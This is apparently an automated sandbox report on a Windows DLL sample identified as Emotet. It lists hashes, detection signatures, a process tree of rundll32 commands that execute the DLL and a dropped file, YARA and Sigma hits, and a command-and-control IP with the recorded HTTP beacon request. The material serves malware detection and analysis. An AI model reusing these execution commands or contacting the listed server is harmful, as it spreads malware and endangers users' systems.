Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report efELSMI5R4

Overview

General Information

Sample Name:efELSMI5R4 (renamed file extension from none to dll)
Analysis ID:532312
MD5:1ec5996508211a8d174a1a09d6289463
SHA1:ede146abf146c0dfdb88431dfecf5cc80b267335
SHA256:2933137a5e251f44b2e6d2cc919c8a679651a76b900b3b9e2b06edc73b64e5e6
Tags:32dllexetrojan
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
Changes security center settings (notifications, updates, antivirus, firewall)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage
AV process strings found (often used to terminate AV products)
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • svchost.exe (PID: 5048 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 6740 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 6416 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • loaddll32.exe (PID: 6404 cmdline: loaddll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 2064 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6276 cmdline: rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6448 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6316 cmdline: rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 4244 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee",NbYKKsmYIJwkXu MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 360 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 3176 cmdline: rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,ajkaibu MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 5960 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6044 cmdline: rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,akyncbgollmj MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 6552 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 2268 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 308 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5652 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 316 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 6444 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1896 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 204 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5604 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6404 -ip 6404 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 5748 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3128 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 7084 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.562952810.0000000000DFA000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000002.00000002.620708124.00000000011DC000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 35 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            13.2.rundll32.exe.3332418.0.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              13.2.rundll32.exe.3332418.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                2.0.loaddll32.exe.11e3b40.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  2.0.loaddll32.exe.11e3b40.1.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    2.0.loaddll32.exe.11e3b40.4.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 75 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Emotet RunDLL32 Process CreationShow sources
                      Source: Process startedAuthor: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee",NbYKKsmYIJwkXu, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 4244, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL, ProcessId: 360

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: efELSMI5R4.dllVirustotal: Detection: 19%Perma Link
                      Source: efELSMI5R4.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: unknownHTTPS traffic detected: 45.63.5.129:443 -> 192.168.2.3:49815 version: TLS 1.2
                      Source: efELSMI5R4.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000016.00000003.582794929.000000000058C000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583003342.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582874162.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582894630.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582878740.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000016.00000003.582894630.0000000000559000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582878740.0000000000559000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000016.00000003.583003342.0000000000553000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582874162.0000000000553000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.582869667.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583186515.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604642586.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604322551.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000016.00000003.590810791.0000000004621000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.608934317.0000000004F51000.00000004.00000001.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 00000016.00000002.597098712.0000000000432000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000016.00000003.582869667.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000016.00000003.583186515.000000000054D000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604642586.0000000000CAC000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.604322551.0000000000CAC000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 2_2_6ECF0927 FindFirstFileExW,2_2_6ECF0927
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_6ECF0927 FindFirstFileExW,5_2_6ECF0927
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009BE2C8 FindFirstFileW,26_2_009BE2C8

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 45.63.5.129 187Jump to behavior
                      Source: Joe Sandbox ViewASN Name: AS-CHOOPAUS AS-CHOOPAUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET /fWxVMEvEItuVfHPcFsGHwLkZfscDpKaAeHKyPiJIqQ HTTP/1.1Cookie: BPnBmsPHiG=8D4dsLTWN8wEGAED/TDSscJN6tz6UiW9Sa7p1L1j+sV8peUY3i4h541A7FXE4tOLJPvGODcUqyKdZRdd4eLVMSqHn/QSuYDzDawRyYOBXu6fQpi7mDqtISdNgCJdqllab7kmTC8JkExQ5QdDNiC5RaFQkQmH8lhmwU8xXoXh+j8s7+Z3BdjBH7uOOgjnzk8PadPgkEn5XuuSWvqAvHt+OIGRsSH4rQBUpgvQ1fCY/yKMeukT8WwcUdr5/JoJiNMk/ZsMMpoKYsGTM1YS3andCGr7w3voV5dtu6EWrfS2xnLTBepk11l/Ck/dvR9iQCeMbJwbV/hbshMw7htS0Fv4102otz0kFPNoh61rQXO2VxiWNrBF0xk=Host: 45.63.5.129Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.63.5.129
                      Source: svchost.exe, 0000001C.00000003.676499557.00000214D4D96000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z||.||6f0c105d-3db6-47de-894d-fd95973349e2||1152921505694224549||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: svchost.exe, 0000001C.00000003.676499557.00000214D4D96000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2021-11-26T13:57:30.0386475Z||.||6f0c105d-3db6-47de-894d-fd95973349e2||1152921505694224549||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku"
                      Source: WerFault.exe, 00000018.00000002.620064823.0000000004C18000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.618456915.0000000004C00000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.618557628.0000000004C17000.00000004.00000001.sdmp, WerFault.exe, 00000018.00000003.618529956.0000000004C14000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000002.693696632.00000214D4D00000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 0000001C.00000002.693406330.00000214D46EB000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: Amcache.hve.22.drString found in binary or memory: http://upx.sf.net
                      Source: svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 0000001C.00000003.672417504.00000214D4D8D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672459141.00000214D4DCE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.672477338.00000214D4DAE000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 0000001C.00000003.673502580.00000214D5202000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673473376.00000214D4D91000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673436832.00000214D4DA8000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.673407994.00000214D4DA8000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 26_2_009A3394 InternetReadFile,26_2_009A3394
                      Source: global trafficHTTP traffic detected: GET /fWxVMEvEItuVfHPcFsGHwLkZfscDpKaAeHKyPiJIqQ HTTP/1.1Cookie: BPnBmsPHiG=8D4dsLTWN8wEGAED/TDSscJN6tz6UiW9Sa7p1L1j+sV8peUY3i4h541A7FXE4tOLJPvGODcUqyKdZRdd4eLVMSqHn/QSuYDzDawRyYOBXu6fQpi7mDqtISdNgCJdqllab7kmTC8JkExQ5QdDNiC5RaFQkQmH8lhmwU8xXoXh+j8s7+Z3BdjBH7uOOgjnzk8PadPgkEn5XuuSWvqAvHt+OIGRsSH4rQBUpgvQ1fCY/yKMeukT8WwcUdr5/JoJiNMk/ZsMMpoKYsGTM1YS3andCGr7w3voV5dtu6EWrfS2xnLTBepk11l/Ck/dvR9iQCeMbJwbV/hbshMw7htS0Fv4102otz0kFPNoh61rQXO2VxiWNrBF0xk=Host: 45.63.5.129Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 45.63.5.129:443 -> 192.168.2.3:49815 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 13.2.rundll32.exe.3332418.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.770000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.860000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.e12148.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.1100000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c920a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c30000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.e12148.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.11e3b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.rundll32.exe.c50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c920a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.932160.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.35a0000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.rundll32.exe.9a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.loaddll32.exe.11e3b40.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.rundll32.exe.9a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.11e3b40.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.c30000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.loaddll32.exe.1100000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.35a0000.1.unpack, type: UNPACKEDPE
